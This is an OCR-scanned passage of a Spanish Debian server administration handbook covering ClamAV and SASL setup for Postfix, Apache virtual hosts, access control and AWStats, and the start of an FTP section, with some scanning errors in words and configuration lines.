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rendimiento  mucho  mejor  que  los  filtros  ajenos  a  los  servidores  de  correo.  Sendmail  introdujo 
inicialmente  a  los  milters,  pero  Postfix  los  implemento  poco  despues. 


VISTA  RAPIDA  El  paquete  spamass-m liter  provee  un  milter  basadoen  SpamAssassin,  el  famoso  de- 
Un  milter  para  tector  de  correo  no  deseado.  Puede  utilizarlo  para  marcar  mensajes  como  probable 
Spamassassin  sPam  (agregando  una  cabecera  adicional)  y/o  rechazar  el  mensaje  completamente 
si  su  «puntaje  de  spam»  supera  cierto  lfmite. 


Una  vez  que  instalo  el  paquete  clamav-milter,  deberfa  reconfigurar  el  milter  para  que  ejecute  en 
un  puerto  TCP  en  lugar  del  zocalo  con  nombre  predeterminado.  Puede  lograr  esto  ejecutando 
dpkg-reconfigure  clamav-milter.  Cuando  se  le  pregunte  por  la  «Interfaz  de  comunicacion 
con  Sendmail»,  responda  «inet:10002@127.0.0.1». 


NOTA 

Puerto  TCP  real  contra 
zocalo  con  nombre 


La  razon  por  la  que  utilizamos  un  puerto  TCP  real  en  lugar  del  zocalo  con  nombres 
es  que  los  demonios  postfix  generalmente  ejecutan  en  un  chroot  y  no  tienen  acceso 
al  directorio  que  contiene  el  zocalo  con  nombre.  En  caso  que  decida  utilizar  el  zocalo 
con  nombre,  utilice  una  ubicacion  dentro  del  chroot  (/var/spool/postfix/). 


La  configuracion  estandar  de  ClamAV  se  ajusta  a  la  mayoria  de  las  situaciones,  pero  puede  per- 
sonalizar  algunos  parametros  importantes  con  dpkg-  reconfigure  clamav-base. 

El  ultimo  paso  involucra  decirle  a  Postfix  que  utilice  el  filtro  recientemente  configurado.  Esto 
es  tan  simple  como  agregar  la  siguiente  directiva  a  /etc/postfix/main .  cf: 

#  Revision  de  virus  con  clamav-milter 
smtpd  milters  =  inet :[ 127 . 0 . 0 . 1] : 10002 

Si  el  antivirus  causa  problema,  puede  comentar  esta  linea;  debera  ejecutar  service  postfix 
reload  para  que  se  tenga  en  cuenta  el  cambio. 


EN  LA  PRACTICA  Una  vez  que  configure  el  antivirus,  debe  probar  que  funciona  correctamente.  La 
Prueba  del  antivirus  forma  mas  simple  de  hacerlo  es  enviar  un  correo  de  prueba  con  un  adjunto  que 
contenga  el  archivo  eicar .  com  (o  eicar .  com .  zip)  que  puede  descargar: 

*-  http : //www. eicar . org/86- 0- Intended -use.html 

Este  archivo  no  es  un  virus  real  sino  un  archivo  de  prueba  que  todo  software  anti¬ 
virus  en  el  mercado  diagnostica  como  un  virus  para  poder  probar  instalaciones. 


Todos  los  mensajes  gestionados  por  Postfix  ahora  pasaran  a  traves  del  filtro  antivirus. 


1 1.1.7.  SMTP  autenticado 

Para  poder  enviar  correos  es  necesario  poder  acceder  a  un  servidor  SMTP;  tambien  requiere  que 
dicho  servidor  SMTP  permita  el  envio  de  correos.  Para  usuarios  moviles,  puede  ser  necesario 
cambiar  la  configuracion  de  su  cliente  SMTP  regularmente,  ya  que  el  servidor  SMTP  de  Falcot 
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rechaza  los  mensajes  que  provienen  de  direcciones  IPs  que  no  parecen  pertenecer  a  la  compama. 
Existen  dos  soluciones:  o  bien  los  usuarios  moviles  instalan  un  servidor  SMTP  en  sus  equipos,  o 
utilizan  el  servidor  de  la  compama  con  alguna  forma  de  autenticarse  como  empleados.  No  se 
recomienda  la  primera  solucion  ya  que  el  equipo  no  estara  conectado  permanentemente  y  no 
podra  volver  a  intentar  enviar  mensajes  en  caso  de  problemas;  nos  centraremos  en  la  ultima 
solucion. 

La  autenticacion  SMTN  en  Postfix  depende  de  SASL  ( capa  de  seguridady  autenticacion  simple:  «Sim- 
ple  Authentication  and  Security  Layer»).  Necesitara  instalar  los  paquetes  libsasl2-modules  y  sasl2- 
bin,  y  luego  registrar  una  contrasena  en  la  base  de  datos  SALS  para  cada  usuario  que  necesite 
autenticarse  en  el  servidor  SMTP.  Puede  hacerlo  con  el  programa  saslpasswd2  que  toma  varios 
parametros.  La  opcion  -u  define  el  dominio  de  autenticacion,  que  debe  coincidir  con  el  para- 
metro  smtpd_sasl_local_domain  en  la  configuracion  de  Postfix.  La  opcion  -c  permite  crear  un 
usuario  y  la  opcion  -f  permite  especificar  el  archivo  a  utilizar  si  necesita  almacenar  la  base  de 
datos  SALS  en  una  ubicacion  diferente  a  la  predeterminada  (/etc/sasldb2). 

#  saslpasswd2  -u  'postconf  -h  myservidor'  -f  /var/spool/postfix/etc/sasldb2  -c  jean 
[...  ingrese  la  contrasena  de  jean  dos  veces  ...] 


Note  que  se  creo  la  base  de  datos  SASL  en  el  directorio  de  Postfix.  Para  poder  asegurar  consisten¬ 
cy,  tambien  convertimos  /etc/sasldb2  en  un  enlace  simbolico  que  apunta  a  la  base  de  datos 
utilizada  por  Postfix  con  In  -sf  /va  r/spool/postfix/etc/sasldb2  /etc/sasldb2. 

Ahora  necesitamos  configurar  Postfix  para  que  utilice  SASL.  Primero  necesita  agregar  al  usuario 
postfix  al  grupo  sasl  para  que  pueda  acceder  a  la  base  de  datos  SASL.  Tambien  necesitara  agregar 
algunos  parametros  nuevos  para  activar  SASLy  necesita  configurar  el  parametro  smtpd_recip 
ient_restrictions  para  permitir  que  los  clientes  autenticados  por  SASL  puedan  enviar  correos 
libremente. 


Ejemplo  11.15  Activacion  de  SASL  en  /etc/ postfix/ main .  cf 


#  Activar  autenticacion  SASL 
smtpdsaslauthenable  =  yes 

#  Definir  el  dominio  de  autenticacion  SASL 
smtpd  sasllocaldomain  =  $myhostname 

[.  .  .] 

#  Agregar  permitsaslauthenticated  antes  de  rej ectunauthdestination 

#  permite  reenviar  correos  enviados  por  usuarios  autenticados  por  SASL 
smtpdrecipientrest rictions  =  permitmynetworks, 

permitsaslauthenticated , 
rej  ectunauthdestination , 

[...] 
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EXTRA 

La  mayorfa  de  los  clientes  de  correo  pueden  autenticarse  con  un  servidor  SMTP 

Cliente  SMTP 
autenticado 

antes  de  enviar  mensajes,  y  utilizar  esta  funcionalidad  es  tan  simple  como  configu- 
rar  los  parametros  apropiados.  Si  el  cliente  utilizado  no  provee  esta  funcionalidad, 
puede  utilizar  un  servidor  Postfix  local  y  configurarlo  para  reenviar  el  correo  a  tra- 
ves  de  un  servidor  SMTP  remoto.  En  este  caso,  el  Postfix  local  sera  el  cliente  que  se 
autentica  con  SASL.  Estos  son  los  parametros  necesarios: 

smtp  sasl  auth  enable  =  yes 

smtp  sasl  password  maps  =  hash : /etc/postf ix/sasl  passwd 
relay  host  =  [mail.falcot.com] 

El  archivo  /etc/postf ix/sasl  passwd  necesita  contener  el  nombre  de  usuarios 
y  la  contrasena  a  utilizar  para  autenticarse  en  el  servidor  mail.falcot.com.  Por 
ejemplo: 

[mail.falcot.com]  joe : Lyinlsj i 

Como  en  todos  los  archivos  de  asociacion  de  Postfix,  debe  convertir  este  archivo  en 
/etc/postf ix/sasl  passwd .  db  con  el  programa  postmap. 

11.2.  Servidor  web  (HTTP) 

Los  administradores  de  Falcot  Corp  decidieron  utilizar  el  servidor  HTTP  Apache,  cuya  version 
2.4.10  estaba  incluida  en  la  distribucion  Debian  Wheezy. 

ALTERNATIVA 

Apache  es  simplemente  el  servidor  web  mas  conocido  (y  mas  utilizado),  pero  exis- 

Otros  servidores  web 

ten  otros;  pueden  ofrecen  mejor  rendimiento  bajo  ciertos  tipos  de  carga  pero  tienen 
la  desventaja  de  una  menor  cantidad  de  funcionalidad  y  modulos  disponibles.  Sin 
embargo,  cuando  el  servidor  web  en  consideracion  es  para  proveer  archivos  estati- 
cos  o  funcionar  como  proxy,  vale  la  pena  investigar  las  alternativas  como  nginx  y 
lighttpd. 

11.2.1.  Instalacion  de  Apache 

Lo  unico  que  necesita  es  instalar  el  paquete  apache2.  Contiene  todos  los  modulos,  inclufdos  los 
Modulos  de  Multi-proceso  (MPMs),  que  afectan  a  como  Apache  gestiona  el  procesamiento  en  pa- 
ralelo  de  muchas  peticiones  (que  suelen  facilitarse  en  los  paquetes  separados  apache2-mpm-*”. 
Arrastrara  tambien  apache2-utils,  que  contiene  las  utilidades  de  linea  de  ordenes  que  descubrire- 
mos  mas  tarde. 

El  uso  de  MPM  en  Apache  afecta  significativamente  al  manejo  de  las  peticiones  concurrentes. 
Con  el  worker  MPM,  se  usan  hilos  (procesos  ligeros)  mientras  que  con  prefork  MPM  usa  un  con- 
junto  de  procesos  creados  previamente.  Con  el  uso  de  event  MPM  tambien  usa  hilos  pero  las 
conexiones  inactivas  (las  que  se  mantienen  abiertas  por  la  caracteristica  keep-alive  de  HTTP) 
son  llevadas  por  el  gestor  de  hilos  dedicado. 
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Los  administradores  de  Falcot  tambien  instalan  libapache2-mod-php5  para  incluir  la  compatibili- 
dad  con  PHP  en  Apache.  Esto  causa  que  se  el  MPM  se  desactive  en  el  evento  por  defecto  y,  en  su 
lugar  se  haga  uso  de  prefork,  ya  que  PHP  solo  funciona  bajo  ese  MPM  particular. 


SEGURIDAD 

Ejecucion  bajo  el  usuario 
www-data 


De  forma  predeterminada,  Apache  administra  todas  las  peticiones  entrantes  bajo 
la  identidad  del  usuario  www-data.  Esto  significa  que,  en  caso  de  una  vulnerabilidad 
de  seguridad  en  un  script  CGI  ejecutado  por  Apache  (para  una  pagina  dinamica), 
no  se  comprometera  todo  el  sistema  sino  solo  los  archivos  que  son  propiedad  de 
este  usuario  en  particular. 


Los  modulos  suexec  permiten  evitar  esta  limitacion  para  que  algunos  scripts  CGI 
ejecuten  bajo  la  identidad  de  otros  usuarios.  Puede  configurarlo  con  la  directiva 
SuexecUserGroup  usuario  grupoen  la  configuracion  de  Apache. 

Otra  posibilidad  es  utilizar  un  MPM  dedicado,  como  el  que  provee  el  paquete 
libapache2-mpm-itk.  Este  MPM  en  particular  tiene  un  comportamiento  ligeramen- 
te  diferente:  permite  «aislar»  los  servidores  virtuales  («virtual  hosts»)  (actualmente, 
conjuntos  de  paginas)  para  que  cada  uno  ejecute  como  un  usuario  diferente.  Por  lo 
tanto,  una  vulnerabilidad  en  un  sitio  web  no  puede  comprometer  los  archivos  que 
pertenecen  al  dueno  de  otro  sitio  web. 


VISTA  RAPIDA  Puede  encontrar  la  lista  completa  de  los  modulos  estandar  de  Apache  en  la  red. 
Lista  de  modulos  »  http://httpd.apache.org/docs72. 4/mod/ index . html 


Apache  es  un  servidor  modular  y  mucha  funcionalidad  esta  implementada  por  modulos  ex- 
ternos  que  el  programa  principal  carga  durante  su  inicializacion.  La  configuracion  predeter¬ 
minada  solo  activa  los  modulos  mas  comunes,  pero  activar  nuevos  modulos  es  tan  simple  co¬ 
mo  ejecutar  a2enmod  modulo;  similarmente,  podra  desactivar  un  modulo  ejecutando  a2dismod 
modulo.  En  realidad,  estos  programas  solo  crean  (o  eliminan)  enlaces  simbolicos  en  /etc/ 
apache2/mods- enabled/  que  apuntan  a  los  archivos  en  si  (almacenados  en  /etc/apache2/ 
mods-available/). 

Con  su  configuracion  predeterminada,  el  servidor  web  escuchara  en  el  puerto  80  (segun  se 
encuentra  configurado  en  /etc/apache2/ports  .  conf)  y  servira  paginas  del  directorio  /var/ 
www/ html/  (segun  se  encuentra  configurado  en  /etc/apache2/sites  -  enabled/000  -  default . 
conf). 


YENDOMAsallA  Apache  2.4,  asi  como  viene,  incluye  el  modulo  SSL  necesario  para  HTTP  seguro 
Compatibilidad  con  SSL  (HTTPS).  Solo  necesita  activarlo  con  a2enmod  sst  y  luego  agregar  las  directivas 

necesarias  a  los  archivos  de  configuracion.  Puede  encontrar  un  archivo  de  configu¬ 
racion  de  ejemplo  en  /etc/apache2/ sites  -  avaitable/def  ault-  ssl .  conf . 

•-  http://httpd.apache.0rg/docs/2. 4/mod/ mods  si .html 

Debe  tener  ciertos  cuidados  adicionales  si  prefiere  conexiones  SSL  con  «Perfect 
Forward  Secrecy»  (secreto  perfecto  a  futuro,  donde  las  conexiones  utilizan  Haves 
efimeras  en  cada  sesion  asegurandose  que  si  se  compromete  la  Have  privada  del 
servidor  no  signifique  que  se  haya  comprometido  todo  el  trafico  antiguo  que  puede 
haberse  almacenado  desde  la  red).  En  particular,  revise  las  recomendaciones  de 
Mozilla: 

»•  https : //wiki .mozilla . org/Security/Server_Side_TLS#Apache 
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11.2. 2.  Configuration  de  servidores  virtuales  («virtual  hosts») 

Un  servidor  virtual  es  una  identidad  adicional  para  el  servidor  web. 

Apache  considera  dos  tipos  distintos  de  servidores  virtuales:  aquellos  basados  en  la  direccion 
IP  (o  puerto)  y  aquellos  basados  en  el  nombre  de  dominio  del  servidor  web.  El  primer  metodo 
requiere  reservar  una  direccion  IP  (o  puerto)  diferente  para  cada  sitio,  mientras  que  el  segundo 
puede  funcionar  en  solo  una  direccion  IP  (y  puerto)  y  se  diferencian  los  sitios  por  el  nombre 
enviado  por  el  cliente  HTTP  (que  solo  funciona  en  la  version  1.1  del  protocolo  HTTP  —  afortuna- 
damente  esta  version  es  suficientemente  antigua  para  que  todos  los  clientes  ya  lo  utilicen). 

La  escasez  (creciente)  de  direcciones  IPv4  generalmente  favorece  el  segundo  metodo;  sin  em¬ 
bargo,  es  mas  complejo  si  los  servidores  virtuales  tambien  necesitan  proveer  HTTPS  ya  que  el 
protocolo  SSL  no  siempre  se  adecuo  a  los  servidores  virtuales  basados  en  nombres;  no  todos  los 
navegadores  son  compatibles  con  la  extension  SNI  ( indicacion  de  nombre  de  servidor:  «Server  Na¬ 
me  Indication)))  que  permite  esta  combination.  Cuando  varios  sitios  HTTPS  necesitan  ejecutar 
en  el  mismo  servidor,  generalmente  se  diferenciaran  bien  por  ejecutar  en  un  puerto  o  en  una 
direccion  IP  diferente  (IPv6  puede  ayudar). 

La  configuration  predeterminada  de  Apache  2,  activa  servidores  virtuales  basados  en  nombre. 
Ademas,  define  un  servidor  virtual  predeterminado  en  el  archivo  /etc/apache2/sites-enabled/ 
000-default. conf;  utilizara  este  servidor  virtual  si  no  se  encuentra  ningun  servidor  que  coincida 
con  el  pedido  enviado  por  el  cliente. 

PRECAUCION  Los  pedidos  que  involucren  un  servidor  virtual  desconocido  siempre  seran  gestio- 
Primer  servidor  virtual  nados  por  el  primer  servidor  virtual  definido,  razon  por  la  que  definimos  alii  a  www. 

f  alcot .  com. 


VISTA  RAPIDA  El  servidor  Apache  es  compatible  con  la  extension  del  protocolo  SSL  llamada  in- 
Compatibilidad  SNI  de  dicacion  de  nombre  de  servidor  (SNI:  «Server  Name  Indication*).  Esta  extension 
Apache  permite  al  navegador  enviar  el  nombre  del  servidor  web  durante  el  establecimiento 
de  la  conexion  SSL,  mucho  antes  del  pedido  HTTP  en  si,  lo  que  antes  utilizaba  para 
identificar  el  servidor  virtual  pedido  entre  aquellos  que  se  encuentran  en  el  mismo 
servidor  (con  la  misma  direccion  IP  y  puerto).  Esto  le  permite  a  Apache  seleccionar 
el  certificado  SSL  apropiado  para  que  continue  la  transaccion. 

Antes  de  SNI,  Apache  siempre  proveia  el  certificado  configurado  en  el  servidor  vir¬ 
tual  predeterminado.  Los  clientes  que  intentaban  acceder  a  otros  servidores  virtua¬ 
les  recibirlan  advertencias  ya  que  el  certificado  que  recibieron  no  coincidia  con  el 
sitio  web  que  estaban  intentando  acceder.  Afortunadamente,  la  mayoria  de  los  na¬ 
vegadores  ahora  utilizan  SNI;  esto  incluye  Microsoft  Internet  Explorer  a  partir  de 
la  version  7.0  (comenzando  con  Vista),  Mozilla  Firefox  desde  la  version  2.0,  Apple 
Safari  desde  la  version  3.2.1  y  todas  las  versiones  de  Google  Chrome. 

El  paquete  Apache  proporcionado  en  Debian  esta  compilado  con  soporte  SNI;  de 
modo  que  no  es  necesario  ninguna  configuracion  particular. 

Tambien  debe  tener  cuidado  de  asegurar  que  la  configuracion  del  primer  servidor 
virtual  (el  utilizado  de  forma  predeterminada)  tenga  TLSvl  activo,  debido  a  que 
Apache  utiliza  los  parametros  de  este  primer  servidor  virtual  para  establecer  cone- 
xiones  seguras  y  jdeberla  permitirlo! 
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Luego  puede  describir  cada  servidor  virtual  adicional  con  un  archivo  almacenado  en  /etc/ 
apache2/sites  -  available/.  La  configuracion  de  un  sitio  web  para  el  dominio  falcot.org  es  tan 
simple  como  crear  el  siguiente  archivo  y  luego  habilitar  el  servidor  virtual  con  a2ensite  www. 
falcot . org. 


Ejemplo  11.16  El  archivo  / etc/ apache2/ sites -available/ www. falcot.org.  conf 


<VirtualHost  *:80> 

Serve rName  www.falcot.org 
ServerAlias  falcot.org 
DocumentRoot  /srv/www/www. falcot .org 
</VirtualHost> 


El  servidor  Apache,  como  esta  configurado  hasta  ahora,  utiliza  los  mismos  archivos  de  registro 
para  todos  los  servidores  virtuales  (puede  cambiarlo  agregando  directivas  Custom  Log  en  las 
definiciones  de  servidores  virtuales).  Por  lo  tanto,  tiene  sentido  personalizar  el  formato  de  este 
archivo  de  registro  para  incluir  el  nombre  del  servidor  virtual.  Puede  hacerlo  creando  un  archivo 
/etc/apache2/conf  -  available/ customlog  .conf  que  define  un  nuevo  formato  para  todos  los 
archivos  de  registro  (con  la  directiva  LogFormat)  y  habilitandolo  con  la  orden  a2enconf  cus 
tomlog.  Tambien  debe  eliminar  (o  comentar)  la  linea  CustomLog  del  archivo  /etc/apache2/ 
sites- available/000- default . conf. 


Ejemplo  11.17  El  archivo  / etc/ apache!/ conf .  d/ customlog .  conf 


#  Nuevo  formato  de  registro  que  incluye  el  nombre  del  servidor  (virtual) 

LogFormat  "%v  %l  %u  %t  \"%r\"  %>s  \"  %{Referer}i\"  \"  %{User-Agent}i\""  vhost 

#  Ahora  utilicemos  este  formato  de  forma  predeterminada 
CustomLog  /var/log/apache2/access  .  log  vhost 


11.2.3.  Directivas  comunes 

Esta  seccion  revisa  brevemente  alguna  de  las  directivas  de  configuracion  de  Apache  mas  utiliza- 
das. 

El  archivo  de  configuracion  principal  generalmente  incluye  varios  bloques  Directory  que  permi- 
ten  diferentes  comportamientos  del  servidor  dependiendo  de  la  ubicacion  del  archivo  que  esta 
proveyendo.  Tales  bloques  usualmente  incluyen  directivas  Options  y  AllowOverride. 
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Ejemplo  11.18  Bloque  Directory 


<Di rectory  /var/www> 

Options  Includes  FollowSymlinks 
AllowOverride  All 

Directorylndex  index. php  index.html  index.htm 
</Directory> 


La  directiva  Directorylndex  contiene  una  lista  de  archivos  a  intentar  cuando  el  pedido  del  cliente 
es  un  directorio.  El  primer  archivo  de  la  lista  que  exista  sera  utilizado  y  enviado  como  respuesta. 

La  directiva  Options  debe  seguirse  de  una  lista  de  opciones  a  activar.  El  valor  None  desactiva 
todas  las  opciones;  correspondientemente,  All  las  activa  todas  excepto  MultiViews.  Las  opciones 
disponibles  incluyen: 

■  ExecCGI  indica  que  puede  ejecutar  scripts  CGI. 

■  FollowSymlinks  le  dice  al  servidor  que  puede  seguir  los  enlaces  simbolicos  y  que  la  res¬ 
puesta  debe  contener  el  contenido  del  objetivo  de  dichos  enlaces. 

■  SymlinksIfOwnerMatch  tambien  le  indica  al  servidor  que  siga  los  enlaces  simbolicos,  pero 
solo  cuando  el  enlace  y  su  objetivo  tengan  el  mismo  dueno. 

■  Includes  activa  inclusiones  del  lado  del  servidor  (SSI:  «Server  Side  Includes»).  Estas  directivas 
se  encuentran  en  las  paginas  HTML  y  son  ejecutadas  en  el  momento  de  cada  pedido. 

■  Indexes  le  indica  al  servidor  que  provea  una  lista  del  contenido  de  los  directorios  si  el 
pedido  HTTP  del  cliente  apunta  a  un  directorio  sin  un  archivo  de  mdice  (es  decir,  que  no 
existe  en  el  ninguno  de  los  archivos  enumerados  en  la  directiva  Directorylndex). 

■  MultiViews  activa  la  negociacion  de  contenido;  el  servidor  puede  utilizar  esto  para  pro¬ 
veer  una  pagina  web  que  utilice  el  idioma  preferido  configurado  en  el  navegador. 


VOLVER  A  LOS  CIMIENTOS  El  archivo  .  htaccess  contiene  directivas  de  configuracion  de  Apache  que  aplican 
Archivo  htaccess  ca<Ia  vez  que  un  pedido  involucra  un  elemento  del  directorio  en  el  que  se  encuentra 
este  archivo.  El  alcance  de  estas  directivas  tambien  incluye  a  sus  subdirectorios. 

La  mayoria  de  las  directivas  que  pueden  ocurrir  en  un  bloque  Directory  tambien 
son  validas  en  un  archivo  .  htaccess. 


La  directiva  AllowOverride  enumera  todas  las  opciones  que  pueden  ser  activadas  o  desactivadas 
en  un  archivo  .  htaccess.  Un  uso  comun  de  esta  opcion  es  restringir  ExecCGI  para  que  los  ad- 
ministradores  puedan  elegir  los  usuarios  que  podran  ejecutar  programas  bajo  la  identidad  del 
servidor  web  (el  usuario  www-data). 
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Autenticacion  obligatoria 

En  algunas  cirucunstancia  necesitara  restringir  el  acceso  a  partes  de  un  sitio  web,  de  forma  que 
solo  usuarios  legftimos  que  provean  un  nombre  de  usuario  y  una  contrasena  tengan  acceso  al 
contenido. 


Ejemplo  11.19  Archivo  .  ht access  para  autenticacion  obligatoria 


Require  valid-user 
AuthName  "Private  directory" 

AuthType  Basic 

AuthllserFile  /etc/apache2/authf iles/htpasswd- private 


SECURIDAD  El  sistema  de  autenticacion  utilizado  en  el  ejemplo  anterior  (Basic)  tiene  una  segu- 
Sin  seguridad  ddad  minima  ya  que  se  envia  la  contrasena  en  texto  piano  (codificada  solamente 
con  base64  que  es  solo  una  codificacion,  no  un  metodo  de  cifrado).  Tambien  debe 
saber  que  los  documentos  «protegidos»  por  este  mecanismo  tambien  son  enviados 
sin  cifrar  a  traves  de  la  red.  Si  la  seguridad  es  importante,  debe  cifrar  la  conexion 
HTTP  completa  con  SSL. 


El  archivo  /etc/apache2/authfiles/htpasswd  -  private  contiene  unalista  de  usuarios  y  con- 
trasenas;  usualmente  lo  manipulara  con  el  programa  htpasswd.  Por  ejemplo,  ejecute  lo  siguiente 
para  agregar  un  usuario  o  cambiar  su  contrasena: 

#  htpasswd  /etc/apache2/authfiles/htpasswd-private  usuario 

New  password: 

Re-type  new  password: 

Adding  password  for  user  usuario 


Restriction  de  acceso 

Las  directiva  Require  controla  las  restricciones  de  acceso  a  un  directorio  (y  sus  subdirectories 
de  forma  recursiva). 

Puede  usarse  para  restringir  el  acceso  basado  en  varios  criterios;  Pararemos  describiendo  la 
restriccion  de  acceso  basada  en  la  direccion  IP  del  cliente,  pero  puede  realizarse  de  un  modo 
mucho  mas  potente  que  eso,  especificando  varias  directivas  Require  combinadas  con  un  bloque 
RequireAll. 


Ejemplo  11.20  Solo  permitir  desde  la  red  local 


Require  ip  192.168.0.0/16 
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ALTERNATIVA 


La  sintaxis  Require  solo  esta  disponible  en  Apache  2.4  (la  version  que  se  encuentra 
Sintaxis  antigua  en  Jess'e )■  Para  los  usuarios  de  Wheezy,  la  sintaxis  de  Apache  2.2  es  diferente,  y  la 
describiremos  aqui  principalmente  como  referencia,  aunque  tambien  puede  estar 
disponible  en  Apache  2.4  haciendo  uso  del  modulo  mod  access  compat. 

Las  directivas  Allow  from  y  Deny  from  controlan  las  restricciones  de  acceso  a  un 
directorio  (y  sus  subdirectories  de  forma  recursiva). 

La  direct iva  Order  le  indica  al  servidor  el  orden  en  el  que  aplicar  las  directivas  Allow 
from  y  Deny  from;  la  ultima  que  coincida  tiene  precedencia.  En  terminos  concretos, 
Order  deny, allow  permite  acceso  si  no  coincide  ninguna  regia  Deny  from  o  si 
coincide  una  directiva  Allow  from.  A  la  inversa.  Order  allow, deny  rechaza  el 
acceso  si  no  coincide  ninguna  directiva  Allow  from  (o  si  coincide  una  directiva 
Deny  from). 

A  las  directivas  Allow  from  y  Deny  from  le  puede  seguir  una  direccion  IP,  una 
red  (como  192.168.0.0/255.255.255.0,  192.168.0.0/24  o  inclusive  192.168. 
0),  un  nombre  de  equipo  o  nombre  de  dominio  o  la  palabra  clave  all  que  incluye  a 
todos. 

Por  ejemplo,  para  rechazar  conexiones  de  forma  predeterminada  pero  permitir  las 
que  provienen  de  la  red  local  podria  usar  esto: 

Order  deny, allow 

Allow  from  192.168.0.0/16 

Deny  from  all 


11.2.4.  Analizadores  de  registros 

Generalmente  se  instala  un  analizador  de  registros  en  un  servidor  web;  ya  que  este  provee  a  los 
administradores  una  idea  precisa  sobre  los  patrones  de  uso  del  servidor. 

Los  administradores  de  Falcot  Corp  seleccionaron  AWStats  (estadisticas  web  avanzadas:  «Advan- 
ced  Web  Statistics)  para  analizar  sus  archivos  de  registro  de  Apache. 

El  primer  paso  de  configuracion  es  personalizar  el  archivo  /etc/awstats/awstats  .  conf .  Los 
administradores  de  Falcot  lo  mantuvieron  sin  cambios  mas  que  los  siguientes  parametros: 

Log File="/var/log/apache2/ac cess .log" 

LogFormat  =  " %virtualname  Ihost  %other  %logname  %timel  %riethodurl  %code  %bytesd  % 
refererquot  %uaquot" 

SiteDomain="www. falcot . com" 

HostAliases="falcot . com  REGEX[^. *\ . falcot\ . com$] " 

DNSLookup=l 

LoadPlugin="tooltips" 


Todos  estos  parametros  estan  documentados  con  comentarios  en  el  archivo  de  la  plantilla.  En 
particular,  los  parametros  Log  Filey  LogFormat  describen  la  ubicacion  y  el  formato  del  archivo 
de  registros  y  la  informacion  que  contiene;  SiteDomain  y  HostAliases  enumeran  los  varios 
nombres  con  los  que  se  conocera  el  sitio  web  principal. 
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En  sitios  con  mucho  trafico,  no  deberfa  definir  DNSLookup  como  1;  para  sitios  mas  pequenos, 
como  el  de  Falcot  ya  descripto,  esta  configuracion  permite  conseguir  reportes  mas  legibles  que 
incluyen  nombres  completos  de  equipos  en  lugar  de  solo  direcciones  IP. 


SEGURIDAD  De  forma  predeterminada  AWStats  genera  estadisticas  disponibles  en  el  sitio  web 
Acceso  a  las  estadisticas  s'n  restricciones,  pero  puede  configurarlas  para  que  solo  unas  pocas  direcciones  IP 

(probablemente  internas)  puedan  accederlas;  necesita  definir  la  lista  de  direcciones 
IP  permitidas  en  el  parametro  ALlowAccessFromWebToFollowingIPAddresses 


AWStats  tambien  estara  activo  para  otros  servidores  virtuales;  cada  servidor  virtual  necesita  su 
propio  archivo  de  configuracion,  como  /etc/awstats/awstats . www.  falcot .  org  .  conf. 


Ejemplo  1 1.21  Archivo  de  configuracion  de  AWStats  para  un  servidor  virtual 


Include  "/etc/awstats/awstats . conf" 
SiteDomain="www. falcot .org" 
HostAliases="falcot .org" 


AWStats  utiliza  varios  l'conos  almacenados  en  el  directorio  /usr/share/awstats/icon/.  Para 
que  estos  esten  disponibles  en  el  sitio  web,  necesita  adaptar  la  configuracion  de  Apache  para 
incluir  la  siguiente  directiva: 

Alias  /awstats-icon/  /usr/share/awstats/icon/ 

Luego  de  unos  minutos  (y  una  vez  que  el  script  ejecuto  varias  veces),  los  resultados  estaran 
disponibles  en  el  sitio  web: 

http : //www. falcot . com/cgi- bin/awstats . pi 
http : //www. falcot . org/ cgi- bin/awstats . pi 


PRECAUCION  Para  que  las  estadisticas  tengan  en  cuenta  todos  los  registros,  AWStats  necesita  eje- 
Rotacion  de  archivos  de  cutar  justo  antes  que  se  roten  los  archivos  de  registro  de  Apache.  Teniendo  en  cuen- 
registro  ta  d'rectiva  p  re  rotate  del  archivo  /etc/ log  rotate .  d/a pache2,  puede  solucio- 
narlo  agregando  un  enlace  simbolico  a  /usr/share/awstats/tools/update.  sh 
en  /etc/ log  rotate . d/httpd- p re  rotate: 

$  cat  /etc/logrotate.d/apache2 

/var/log/apache2/* . log  { 
daily 
missingok 
rotate  14 
compress 
delaycompress 
notifempty 
create  644  root  adm 
sharedscripts 
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postrotate 

if  /etc/init . d/apache2  status  >  /dev/null  ;  then  \ 
/etc/init . d/apache2  reload  >  /dev/null;  \ 
fi; 

endscript 

prerotate 

if  [  -d  /etc/logrotate . d/httpd-prerotate  ];  then  \ 
run-parts  /etc/logrotate. d/httpd-prerotate;  \ 
fi;  \ 
endscript 

} 

$  sudo  mkdir  -p  /etc/logrotate. d/httpd-prerotate 
$  sudo  In  -sf  /usr/share/awstats/tools/update . sh  \ 
/etc/logrotate. d/httpd-prerotate/awstats 

Sepa  tambien  que  [os  archivos  de  registro  creados  por  log  rotate  necesitan  ser 
legibles  por  todos,  especialmente  AWStats.  En  el  ejemplo  anterior,  se  garantiza  es- 
to  con  la  linea  create  644  root  adm  (en  lugar  de  los  permisos  predeterminados 
640). 


11.3.  Servidor  de  archivos  FTP 

FTP  ( protocolo  de  transferencia  de  archivos :  «File  Transfer  Protocol)))  es  uno  de  los  primeros  proto- 
colos  de  Internet  (jRFC  959  fue  publicado  en  1985!).  Era  utilizado  para  distribuir  archivos  antes 
que  naciera  la  web  (se  creo  el  protocolo  FITTP  en  1990,  y  su  version  1.0  fue  formalmente  definida 
en  el  RFC  1945  publicado  en  1996). 

El  protocolo  permite  tanto  subir  como  descargar  archivos;  por  esta  razon,  todavia  continua  sien- 
do  utilizado  para  desplegar  actualizaciones  a  un  sitio  web  almacenado  por  nuestro  proveedor 
de  Internet  (o  cualquier  otra  entidad  que  almacene  sitios  web).  En  estos  casos,  se  fuerza  el  acce- 
so  seguro  con  un  identificador  de  usuario  y  una  contrasena;  si  este  es  exitoso,  el  servidor  FTP 
proporciona  acceso  de  lectura  y  escritura  al  directorio  del  usuario. 

Otros  servidores  FTP  son  utilizados  principalmente  para  distribuir  archivos  para  descargar  pu- 
blicamente;  los  paquetes  Debian  son  un  buen  ejemplo.  Se  obtiene  el  contenido  de  estos  servi¬ 
dores  desde  otros  servidores,  geograficamente  remotos;  luego  estos  estaran  disponibles  para 
usuarios  menos  distantes.  Esto  significa  que  no  necesita  autenticacion  del  cliente;  como  con- 
secuencia,  se  conoce  este  modo  de  operacion  como  «FTP  anonimo».  Para  ser  perfectamente 
correcto,  los  clientes  sf  se  autentican  con  el  nombre  de  usuario  anonymous  («anonimo»);  la  con¬ 
trasena  es  generalmente,  por  convencion,  la  direccion  de  correo  del  usuario,  pero  el  servidor  la 
ignora. 

